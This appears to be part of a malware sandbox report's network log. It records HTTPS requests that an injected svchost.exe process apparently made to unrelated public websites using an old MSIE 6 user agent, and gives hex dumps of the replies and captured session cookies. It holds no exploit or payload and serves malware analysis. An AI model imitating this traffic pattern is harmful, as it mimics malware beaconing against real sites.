                                                                                                                                                                                                                                                        Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2857INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        15192.168.2.35848075.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2856OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: ldh.la.gov
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2857INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:08 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 1346
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2857INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        16192.168.2.359300104.21.52.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2859OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2859INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:08 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Content-Length: 5723
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                        Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        cf-mitigated: challenge
                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZIoRTwkARjzRTdnQA%2FbPhn7TPgzE7K7SCKhnVa6rcO6ly8I92PoXmlaItmWXMpJeiKRR5X45tuIGROCMgUkVBl38DfCGmuW45a%2BXoqJ0Te79Uw8P24s0OEVN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 81371a370ce008f6-LAX
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2860INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatibl
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2861INData Raw: 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                        Data Ascii: e" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"><meta http-equiv="refresh" content="35"></head><body class=
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2862INData Raw: 6a 49 58 64 66 66 63 4b 43 61 76 6e 4b 55 5a 4b 4d 55 71 59 64 78 32 55 5f 75 41 5f 39 38 6d 4e 38 52 64 33 43 33 50 61 30 41 66 6b 65 4e 63 53 53 43 68 55 36 74 35 56 41 4a 6e 5f 75 45 65 37 4e 5a 4f 67 39 41 61 4d 31 75 50 32 59 36 49 6d 52 43 72 57 49 32 64 48 4b 71 67 55 4f 38 77 51 46 36 32 32 2d 4f 34 54 67 6c 4e 64 5f 58 42 4a 4d 39 7a 7a 55 69 54 54 54 35 4a 6e 35 77 30 7a 61 4d 2d 66 69 5f 53 77 53 5a 74 42 6d 4f 6b 69 37 35 33 41 53 76 49 46 62 53 6b 70 62 49 52 48 32 69 45 34 52 67 67 64 49 44 6d 43 75 52 6f 5f 76 48 58 4a 68 30 61 43 69 4d 43 30 5f 79 75 38 66 54 50 38 42 6e 38 51 79 6d 76 31 36 6f 52 4d 79 69 57 5f 47 5a 34 4f 6d 76 49 59 49 79 4b 77 73 69 41 5f 70 2d 37 44 56 54 64 61 6b 58 61 6c 32 46 68 37 39 6b 6c 42 61 68 72 48 78 35 6d
                                                                                                                                                                                                                                                        Data Ascii: jIXdffcKCavnKUZKMUqYdx2U_uA_98mN8Rd3C3Pa0AfkeNcSSChU6t5VAJn_uEe7NZOg9AaM1uP2Y6ImRCrWI2dHKqgUO8wQF622-O4TglNd_XBJM9zzUiTTT5Jn5w0zaM-fi_SwSZtBmOki753ASvIFbSkpbIRH2iE4RggdIDmCuRo_vHXJh0aCiMC0_yu8fTP8Bn8Qymv16oRMyiW_GZ4OmvIYIyKwsiA_p-7DVTdakXal2Fh79klBahrHx5m
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2863INData Raw: 63 6f 59 66 45 67 2d 67 72 4a 6a 69 61 36 69 70 72 4f 71 7a 2d 68 31 5a 31 6b 54 38 61 32 78 61 41 51 6c 5a 2d 77 37 53 5f 48 70 61 76 67 57 62 6b 52 76 61 4b 79 33 62 56 77 36 2d 79 33 68 65 7a 6a 58 44 61 75 6e 33 44 47 70 73 5a 6a 35 66 5a 6e 2d 53 44 74 33 71 4d 2d 57 6c 69 32 68 55 51 75 4e 4e 37 31 37 57 79 62 58 54 5f 64 49 42 47 4d 35 79 30 7a 6c 69 71 69 6d 54 5f 38 4c 36 33 74 61 6b 4a 36 4c 49 7a 53 6f 5a 74 46 6a 5a 65 47 5f 33 6c 30 4f 76 39 7a 73 5f 77 50 61 38 5f 52 4c 57 4b 31 45 44 43 6e 43 4b 38 46 6d 57 37 65 4d 5a 56 7a 31 55 68 41 77 4e 38 41 43 58 75 75 56 7a 6a 5f 5f 76 32 37 5f 6e 53 59 42 6a 4c 58 5a 6b 53 33 57 2d 7a 54 6c 30 4e 47 69 75 6b 37 67 43 6b 70 4d 33 56 4a 62 42 6c 75 49 4c 33 59 53 45 65 53 70 62 55 33 70 34 39 4a 6f
                                                                                                                                                                                                                                                        Data Ascii: coYfEg-grJjia6iprOqz-h1Z1kT8a2xaAQlZ-w7S_HpavgWbkRvaKy3bVw6-y3hezjXDaun3DGpsZj5fZn-SDt3qM-Wli2hUQuNN717WybXT_dIBGM5y0zliqimT_8L63takJ6LIzSoZtFjZeG_3l0Ov9zs_wPa8_RLWK1EDCnCK8FmW7eMZVz1UhAwN8ACXuuVzj__v27_nSYBjLXZkS3W-zTl0NGiuk7gCkpM3VJbBluIL3YSEeSpbU3p49Jo
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2865INData Raw: 45 56 79 51 57 66 35 76 48 78 6f 48 51 2b 65 4b 68 4f 67 4c 6c 61 65 49 71 6f 69 37 70 48 54 35 6d 7a 77 6b 73 39 68 66 71 4d 79 46 4b 50 6d 33 5a 57 31 61 6d 38 74 4c 71 35 4f 4f 48 32 39 7a 54 4f 37 48 47 32 70 32 6a 44 44 4c 4c 4c 47 6c 5a 32 36 47 73 66 43 36 31 74 76 61 6d 32 69 51 66 49 69 32 75 7a 6f 68 37 7a 56 65 37 62 2f 48 71 51 7a 79 74 31 73 59 53 37 6e 55 74 76 6b 6e 57 68 31 68 51 30 56 76 72 5a 76 6d 4c 70 6f 5a 6b 73 31 56 48 43 68 52 47 44 46 2f 4a 78 4a 62 68 4c 49 58 6b 6b 36 61 4b 6f 48 45 69 33 32 53 58 6c 75 69 34 2f 42 4b 70 6c 30 6e 62 50 6a 63 66 6c 4c 50 62 46 59 58 44 6d 5a 58 77 73 41 2f 43 4f 75 73 52 2f 6e 75 33 42 64 4c 4a 4f 68 58 69 37 58 57 4d 6e 42 44 35 51 61 78 6d 35 4b 48 34 3d 27 2c 74 3a 20 27 4d 54 59 35 4e 6a 67
                                                                                                                                                                                                                                                        Data Ascii: EVyQWf5vHxoHQ+eKhOgLlaeIqoi7pHT5mzwks9hfqMyFKPm3ZW1am8tLq5OOH29zTO7HG2p2jDDLLLGlZ26GsfC61tvam2iQfIi2uzoh7zVe7b/HqQzyt1sYS7nUtvknWh1hQ0VvrZvmLpoZks1VHChRGDF/JxJbhLIXkk6aKoHEi32SXlui4/BKpl0nbPjcflLPbFYXDmZXwsA/COusR/nu3BdLJOhXi7XWMnBD5Qaxm5KH4=',t: 'MTY5Njg
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2866INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                        Data Ascii: getElementsByTagName('head')[0].appendChild(cpo);}());</script></body></html>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        17192.168.2.359304104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2859OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: www.clinicasanluis.com.co
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2900INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        x-powered-by: PHP/8.1.23
                                                                                                                                                                                                                                                        Cache-Control: no-cache, private
                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                        set-cookie: XSRF-TOKEN=eyJpdiI6ImxEUHpsV3JtaW5IRVQ4eUNZTjRWTXc9PSIsInZhbHVlIjoiQm5aQmpPNlN0UkZHenk0WkZsZDNFSmFuMThINm5kVXR2dFZoS1dDYVlTaHRiUkZlZGQyYUcwZTltNnRnN0VseGpEMVVTQi8xbjgrYUR6VWFBOW5ZMEx3Q2t2cGg0bFZPc25wdnVwOCtFSlRPTHVxNmRwbFk2Z1JUeEtBek55MGoiLCJtYWMiOiI3YjAxYTZjNDBiYzA2MmMxN2E4MDJmMzM3NzE3MTE2MDcxYTlhN2Q5NmNmMjVkZDVkMjMxZjZiZTk2ZGRiNGY1IiwidGFnIjoiIn0%3D; expires=Mon, 09-Oct-2023 15:52:09 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                        set-cookie: clinicasanluis_session=eyJpdiI6IlpUQjN3YnJteGN4eUZ0NTFQRlhVV1E9PSIsInZhbHVlIjoidkg3VXU3WGhUSllXVmxQSXNKekozZE1sSWpKVGtYbWROcVhVaCtpNWI3VytPd0dDQlRJd2diajIwTzMrbTFOdXI2NmJWYUI1MXQwQ2ZVTlA5d0NxRHhjd0hWM0VVbnZXRkozVWgwTjdsTEI1MlJWdFVsQmUxWGErU3lrQ01HcDMiLCJtYWMiOiJjZjIzZjQ4ZjU4NmNhNTE4NGE3YzJiYmU3YjMyODMxMWQ3YjMwZjIyMmU4N2NkYWYwNjllNWM5OGE2NjM2N2JlIiwidGFnIjoiIn0%3D; expires=Mon, 09-Oct-2023 15:52:09 GMT; Max-Age=7200; path=/; httponly; secure
                                                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2902INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 62 41 32 44 6e 54 6c 71 58 46 4b 4c 68 61 62 42 36 6c 62 6e 38 32 66 69 48 4c 45 4b 4e 46 33 63 25 32 46 34 52 36 51 30 72 6a 4d 65 36 25 32 42 64 36 75 76 53 53 48 25 32 42 46 39 38 78 4b 6f 64 6b 63 70 44 6b 6f 39 52 4c 55 4a 49 43 62 42 68 74 7a 58 53 70 5a 47 58 33 53 33 51 52 6b 57 56 67 4d 38 45 6e 25 32 46 51 71 79 31 6f 39 75 37 56 74 51 71 54 6b 35 61 73 63 4b 32 75 6f 45 48 30 79 79 75 64 74 4b 68 69 4d 52 76 65 78 62 32 74 7a 64 52 52 52 41 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bA2DnTlqXFKLhabB6lbn82fiHLEKNF3c%2F4R6Q0rjMe6%2Bd6uvSSH%2BF98xKodkcpDko9RLUJICbBhtzXSpZGX3S3QRkWVgM8En%2FQqy1o9u7VtQqTk5ascK2uoEH0yyudtKhiMRvexb2tzdRRRA"}],"group":"cf-nel","max
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2902INData Raw: 37 66 66 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 0a 20 20 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 53 69 74 65 20 54 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 31 53 35 53 4d 45 44 48 33 4b 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61
                                                                                                                                                                                                                                                        Data Ascii: 7ff9<!doctype html><html lang="es"><head> ... Global Site Tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-1S5SMEDH3K"></script> <script> window.dataLayer = window.dataLa
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2903INData Raw: 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 73 65 6f 2f 73 65 6f 2d 6d 65 74 61 64 61 74 61 2d 73 69 74 65 2d 36 34 39 2e 6a 70 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c c3 ad 6e 69 63 61 20 53 61 6e 20 4c 75 c3 ad 73 20 70 61 72 61 20 6c 61 20 6d 75 6a 65 72 20 79 20 65 6c 20 6e 69 c3 b1 6f 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 72 65 73 65 72 76 61 6d 6f 73 20 6c 61 20 76 69 64 61 20 64 65 20 6c 61 20 6d 75 6a 65 72 20 79 20 65 6c 20 6e 69 c3 b1 6f 20 61 20 74 72 61 76 c3 a9
                                                                                                                                                                                                                                                        Data Ascii: content="https://www.clinicasanluis.com.co/images/seo/seo-metadata-site-649.jpg"><meta property="og:title" content="Clnica San Lus para la mujer y el nio"><meta property="og:description" content="Preservamos la vida de la mujer y el nio a trav
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2905INData Raw: 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 36 30 30 3b 37 30 30 26 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 0a 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 37 30 30 3b 39 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 0a 20 20 20 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e
                                                                                                                                                                                                                                                        Data Ascii: ?family=Open+Sans:wght@400;600;700&family=Rubik:wght@400;500;600;700&display=swap"></noscript><link rel="preload" as="style" href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700;900&display=swap" onload="this.onload=null;this.
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2906INData Raw: 20 50 6f 70 75 70 20 43 53 53 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 21 2d 2d 20 49 63 6f 6e 73 20 43 53 53 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c
                                                                                                                                                                                                                                                        Data Ascii: Popup CSS --><link rel="stylesheet" href="https://www.clinicasanluis.com.co/assets/css/magnific-popup.min.css">... Icons CSS --><link rel="stylesheet" href="https://www.clinicasanluis.com.co/assets/fonts/font-awesome/css/all.min.css"><link rel="styl
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2907INData Raw: 79 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 73 6c 69 63 6b 2d 63 61 72 6f 75 73 65 6c 2f 31 2e 38 2e 31 2f 73 6c 69 63 6b 2d 74 68 65 6d 65 2e 63 73 73 22 0a 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 36 6c 4c 55 64 65 51 35 75 68 65 4d 46 62 57 6d 33 43 50 32 37 31 6c 31 34 52 73 58 31 78 74 78 2b 4a 35 78 32 79 65 49 44 6b 6b 69 42 70 65 56 54 4e 68 54 71 69 6a 4d 45 37 47
                                                                                                                                                                                                                                                        Data Ascii: y="no-referrer" onload="this.onload=null;this.rel='stylesheet'" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick-theme.css" integrity="sha512-6lLUdeQ5uheMFbWm3CP271l14RsX1xtx+J5x2yeIDkkiBpeVTNhTqijME7G
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2909INData Raw: 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 74 68 65 6d 65 73 2f 64 61 6d 6f 73 66 72 6f 6e 74 65 6e 64 2f 72 65 76 6f 6c 75 74 69 6f 6e 2f 63 73 73 2f 6e 61 76 69 67 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 21 2d 2d 20 52 45 56 4f 4c 55 54 49 4f 4e 20 53 4c 49 44 45 52 20 43 55 53 54 4f 4d 20 43 53 53 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 74 68 65 6d 65 73 2f 64 61 6d 6f 73 66 72
                                                                                                                                                                                                                                                        Data Ascii: css" href="https://www.clinicasanluis.com.co/themes/damosfrontend/revolution/css/navigation.css" /> </noscript> ... REVOLUTION SLIDER CUSTOM CSS --> <link rel="stylesheet" type="text/css" href="https://www.clinicasanluis.com.co/themes/damosfr
